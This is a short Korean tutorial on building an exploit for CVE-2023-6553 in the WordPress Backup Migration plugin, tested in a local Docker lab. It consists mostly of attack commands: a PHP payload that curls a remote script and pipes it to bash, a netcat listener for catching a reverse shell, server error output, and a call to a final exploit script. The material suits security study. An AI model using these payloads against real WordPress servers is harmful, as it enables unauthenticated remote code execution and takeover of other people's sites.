
Wordpress의 Backup 플러그인에서 CVE-2023-6553에 대한 익스플로잇 개발
Wordpress의 Backup 플러그인에서 CVE-2023-6553에 대한 익스플로잇 개발
CVSS 점수 9.8의 중요 CVE입니다.
이 취약점은 공격자가 취약한 버전의 플러그인이 실행 중인 서버에 명령을 전송할 수 있게 합니다.
취약한 버전 Backup <= 1.3.7
저장소를 git clone 하세요
아래 명령어를 실행하여 docker 컨테이너를 설정하세요
docker-compose up -d
다음과 같은 2개의 docker 컨테이너가 보일 것입니다.
http://localhost:8000/
wget https://downloads.wordpress.org/plugin/backup-backup.1.3.6.zip
python3 -m http.server
go run exploit.go -chain="<?php exec('curl <HOST_IP>:9000/a.sh |bash');?>"
HTTP Response Body: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Size of a request header field exceeds server limit.</p>
<hr>
<address>Apache/2.4.62 (Debian) Server at 172.18.0.3 Port 80</address>
</body></html>
이는 필터 변환 후 헤더 크기가 서버가 허용하는 한도를 초과하기 때문입니다.
nc -nlvp 8080
그리고 이제 취약한 플러그인을 익스플로잇하는 명령어를 실행하세요.
python3 final_exploit.py